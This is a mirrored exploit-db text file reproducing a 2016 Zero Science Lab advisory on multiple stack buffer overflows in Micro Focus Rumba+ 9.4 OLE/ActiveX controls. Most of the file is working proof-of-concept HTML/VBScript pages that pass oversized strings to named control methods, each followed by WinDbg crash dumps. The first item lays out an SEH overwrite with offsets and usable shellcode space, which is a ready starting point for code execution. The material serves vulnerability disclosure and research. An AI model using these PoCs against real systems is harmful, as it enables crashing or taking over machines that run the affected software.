bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/39857.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

416 lines
No EOL
16 KiB
Text
Raw Blame History

Micro Focus Rumba+ v9.4 Multiple Stack Buffer Overflow Vulnerabilities
Vendor: Micro Focus
Product web page: https://www.microfocus.com
Affected version: 9.4.4058.0 and 9.4.0 SP0 Patch0
Affected products/tools : Rumba Desktop 9.4
Rumba 9.4 Trace
Rumba 9.4 APPC Configuration
Rumba 9.4 AS400 Communications
Rumba 9.4 AS400 File Transfer
Rumba 9.4 Communication Monitor
Rumba 9.4 Engine
Rumba 9.4 Screen Designer
Rumba 9.4 Submit Remote Command ;]
Rumba FTP Client 4.5
Summary: Rumba is a terminal emulation solution with UI (User Interface)
modernization properties. Rumba and Rumba+ allows users to connect to
so-called 'legacy systems' (typically a mainframe) via desktop, web and
mobile.
Desc: Rumba+ software package suffers from multiple stack buffer overflow
vulnerabilities when parsing large amount of bytes to several functions in
several OLE controls. An attacker can gain access to the system of the affected
node and execute arbitrary code.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Enterprise SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5327
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5327.php
03.02.2016
--
----------------------------
1. MacroName (WdMacCtl.ocx):
----------------------------
<html>
<object classid='clsid:56359FC0-E847-11CE-BE79-02608C8F68F1' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\SYSTEM\WdMacCtl.OCX"
prototype = "Function PlayMacro ( ByVal MacroName As String ) As Boolean"
memberName = "PlayMacro"
progid = "ObjectXMacro.ObjectXMacro"
argCount = 1
arg1=String(272, "A") + "BBBB" + String(16, "C") + "DDDD" + "EEEE" + String(14700, "C")
' ^ ^ ^ ^ ^ ^
' | | | | | |
'-----------junk---------ds:edx-------padding-------nseh-----seh------------scspace----
' 6224 bytes usable space
target.PlayMacro arg1
</script>
</html>
===
(1d78.52c): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SysWOW64\ntdll.dll -
eax=00000000 ebx=45454545 ecx=74d72a9c edx=42424242 esi=0032ddc0 edi=00000000
eip=770a15fe esp=0032dd58 ebp=0032ddac iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtRaiseException+0x12:
770a15fe 83c404 add esp,4
0:000> !exchain
0032e7cc: 45454545
Invalid exception stack at 44444444
0:000> d 0032e7cc
0032e7cc 44 44 44 44 45 45 45 45-43 43 43 43 43 43 43 43 DDDDEEEECCCCCCCC
0032e7dc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e7ec 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e7fc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e80c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e81c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e82c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e83c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0032ddac 77147415 0032ddc0 0032de10 00000000 ntdll!NtRaiseException+0x12
0032e0e0 7711071a 45454545 fffffffe fffffffe ntdll!RtlRemoteCall+0x236
0032e130 770db3f5 45454545 0000004d 0032e82c ntdll!RtlUlonglongByteSwap+0x1327a
0032e1b0 77090133 0032e1c8 0032e218 0032e1c8 ntdll!LdrRemoveLoadAsDataTable+0xcac
0032e7b0 41414141 42424242 43434343 43434343 ntdll!KiUserExceptionDispatcher+0xf
0032e7b4 42424242 43434343 43434343 43434343 0x41414141
0032e7b8 43434343 43434343 43434343 43434343 0x42424242
0032e7bc 43434343 43434343 43434343 44444444 0x43434343
0032e7c0 43434343 43434343 44444444 45454545 0x43434343
0032e7c4 43434343 44444444 45454545 43434343 0x43434343
0032e7c8 44444444 45454545 43434343 43434343 0x43434343
0032e7cc 45454545 43434343 43434343 43434343 0x44444444
0032e7d0 43434343 43434343 43434343 43434343 0x45454545
0032e7d4 43434343 43434343 43434343 43434343 0x43434343
0032e7d8 43434343 43434343 43434343 43434343 0x43434343
0032e7dc 43434343 43434343 43434343 43434343 0x43434343
-----------------------------
2. NetworkName (iconfig.dll):
-----------------------------
<html>
<object classid='clsid:E1E0A940-BE28-11CF-B4A0-0004AC32AD97' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\system\iconfig.dll"
prototype = "Property Let NetworkName As String"
memberName = "NetworkName"
progid = "ObjectXSNAConfig.ObjectXSNAConfig"
argCount = 1
arg1=String(9000000, "B")
target.NetworkName = arg1
</script>
</html>
===
STATUS_STACK_BUFFER_OVERRUN encountered
(2958.3e0): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\kernel32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\MSVCR120.dll -
eax=00000000 ebx=616c4480 ecx=76280484 edx=003ee021 esi=00000000 edi=003ee794
eip=76280265 esp=003ee268 ebp=003ee2e4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
kernel32!GetProfileStringW+0x12cc9:
76280265 cc int 3
..
0:000> d esp+400
003ee668 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee678 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee688 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee698 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee6a8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee6b8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee6c8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee6d8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0:000> u
kernel32!GetProfileStringW+0x12cc9:
76280265 cc int 3
76280266 c745fcfeffffff mov dword ptr [ebp-4],0FFFFFFFEh
7628026d e9c574feff jmp kernel32!UnhandledExceptionFilter+0x40 (76267737)
76280272 33c0 xor eax,eax
76280274 40 inc eax
76280275 c3 ret
76280276 8b65e8 mov esp,dword ptr [ebp-18h]
76280279 68090400c0 push 0C0000409h
0:000> dds
003ee6e8 42424242
003ee6ec 42424242
003ee6f0 42424242
003ee6f4 42424242
003ee6f8 42424242
003ee6fc 42424242
003ee700 42424242
003ee704 42424242
003ee708 42424242
003ee70c 42424242
003ee710 42424242
003ee714 42424242
003ee718 42424242
003ee71c 42424242
003ee720 42424242
003ee724 42424242
003ee728 42424242
003ee72c 42424242
003ee730 42424242
003ee734 42424242
003ee738 42424242
003ee73c 42424242
003ee740 1e4cd74b
003ee744 003ec760
003ee748 7594d140 OLEAUT32!DispCallFunc+0xa6
003ee74c 006a191c
003ee750 02f50024
003ee754 006a1a7c
003ee758 001df530
003ee75c 003ee754
003ee760 003ee7f0
003ee764 7594cfba OLEAUT32!VarCmp+0xd35
------------------------
3. CPName (iconfig.dll):
------------------------
<html>
<object classid='clsid:E1E0A940-BE28-11CF-B4A0-0004AC32AD97' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\system\iconfig.dll"
prototype = "Property Let CPName As String"
memberName = "CPName"
progid = "ObjectXSNAConfig.ObjectXSNAConfig"
argCount = 1
arg1=String(8212, "A")
target.CPName = arg1
</script>
</html>
------------------------------
4. PrinterName (ProfEdit.dll):
------------------------------
<html>
<object classid='clsid:09A1C362-676A-11D2-A0BE-0060B0A25144' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll"
prototype = "Property Let PrinterName As String"
memberName = "PrinterName"
progid = "ProfileEditor.PrintPasteControl"
argCount = 1
arg1="http://zeroscience.mk/zslrss.xml"
'or string 10000 bytes
target.PrinterName = arg1
</script>
</html>
===
(23f4.4c2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll -
eax=baadf00d ebx=5fab4b10 ecx=baadf00d edx=003857b8 esi=0030e7b8 edi=0030e66c
eip=5fa63a60 esp=0030e5fc ebp=0030e604 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
ProfEdit+0x13a60:
5fa63a60 c6808401000000 mov byte ptr [eax+184h],0 ds:002b:baadf191=??
----------------------
5. Data (FtxBIFF.dll):
----------------------
<html>
<object classid='clsid:2E67341B-A697-11D4-A084-0060B0C3E4EC' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\AS400\FtxBIFF.dll"
prototype = "Function WriteRecords ( ByVal Row As Long , ByVal Col As Long , ByVal DataType As Long , ByVal Data As String ) As Boolean"
memberName = "WriteRecords"
progid = "FTXBIFFLib.AS400FtxBIFF"
argCount = 4
arg1=2
arg2=3
arg3=r
arg4=String(100000, "A")
target.WriteRecords arg1 ,arg2 ,arg3 ,arg4
</script>
</html>
===
(1164.1dd4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\AS400\FtxBIFF.dll -
eax=00000000 ebx=56c0a928 ecx=757bd0c4 edx=fffff000 esi=baadf00d edi=0036eba8
eip=56bf3011 esp=0033ddc8 ebp=0033ddd4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
FtxBIFF+0x3011:
56bf3011 837e2020 cmp dword ptr [esi+20h],20h ds:002b:baadf02d=????????
0:000> d esp
0033ddc8 f0 dd 33 00 0d f0 ad ba-0d f0 ad ba 48 eb 36 00 ..3.........H.6.
0033ddd8 2c 83 bf 56 02 00 00 00-03 00 00 00 00 00 00 00 ,..V............
0033dde8 f0 dd 33 00 40 eb 36 00-41 41 41 41 41 41 41 41 ..3.@.6.AAAAAAAA
0033ddf8 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0033de08 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0033de18 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0033de28 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0033de38 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
-----------------------------------
6. Serialized (NMSecComParams.dll):
-----------------------------------
<html>
<object classid='clsid:30A01218-C999-4C40-91AE-D8AE4C884A9B' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll"
prototype = "Property Let Serialized As String"
memberName = "Serialized"
progid = "NMSECCOMPARAMSLib.SSL3"
argCount = 1
arg1=String(1333200, "A")
target.Serialized = arg1
</script>
</html>
===
(1508.1a9c): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\OLEAUT32.dll -
eax=00362000 ebx=1003efa0 ecx=001d369c edx=0045e600 esi=0045e8b0 edi=0045e6d4
eip=100366b7 esp=0045e640 ebp=0045e684 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
NMSecComParams!DllUnregisterServer+0x4617:
100366b7 8500 test dword ptr [eax],eax ds:002b:00362000=00000000
---------------------------------
7. UserName (NMSecComParams.dll):
---------------------------------
<html>
<object classid='clsid:3597EAD7-8E7A-4276-AF12-40F8BD515921' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll"
prototype = "Property Let UserName As String"
memberName = "UserName"
progid = "NMSECCOMPARAMSLib.FirewallProxy"
argCount = 1
arg1=String(1026000, "A")
target.UserName = arg1
</script>
</html>
===
(1620.16bc): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\OLEAUT32.dll -
eax=000d2000 ebx=1003edd0 ecx=00000000 edx=003e390a esi=001ceba8 edi=001cea5c
eip=100366b7 esp=001ce9e4 ebp=001cea0c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
NMSecComParams!DllUnregisterServer+0x4617:
100366b7 8500 test dword ptr [eax],eax ds:002b:000d2000=00000000
-------------------------
8. LUName (ProfEdit.dll):
-------------------------
<html>
<object classid='clsid:5A01664E-6CF1-11D2-A0C2-0060B0A25144' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll"
prototype = "Property Let LUName As String"
memberName = "LUName"
progid = "ProfileEditor.MFSNAControl"
argCount = 1
arg1=String(14356, "A")
target.LUName = arg1
</script>
</html>
===
(f10.1cb8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll -
eax=baadf00d ebx=55944ba4 ecx=baadf00d edx=005c32b0 esi=0022e738 edi=0022e5ec
eip=558f3a60 esp=0022e578 ebp=0022e580 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
ProfEdit+0x13a60:
558f3a60 c6808401000000 mov byte ptr [eax+184h],0 ds:002b:baadf191=??
-------------------------
9. newVal (FTPSFtp.dll):
-------------------------
<html>
<object classid='clsid:ACBBEC6D-7FD4-44E3-B1A4-B442D40F5818' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\Micro Focus Utilities\FTP Client\FTPSFtp.dll"
prototype = "Sub Load ( ByVal newVal As String )"
memberName = "Load"
progid = "FTPSFTPLib.SFtpSession"
argCount = 1
arg1=String(13332, "A")
target.Load arg1
</script>
</html>
===
STATUS_STACK_BUFFER_OVERRUN encountered
(608.f74): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\kernel32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SysWOW64\MSVCR120.dll -
eax=00000000 ebx=10027e44 ecx=757d047c edx=0039dc45 esi=00000000 edi=0039e594
eip=757d025d esp=0039de8c ebp=0039df08 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
kernel32!GetProfileStringW+0x12cc1:
757d025d cc int 3
----------------------
10. Host (FTP Client):
----------------------
For the RUMBA FTP Client PoC, copy ~300 bytes array and paste it in the Host field when creating a new session.
Reference in a new issue View git blame Copy permalink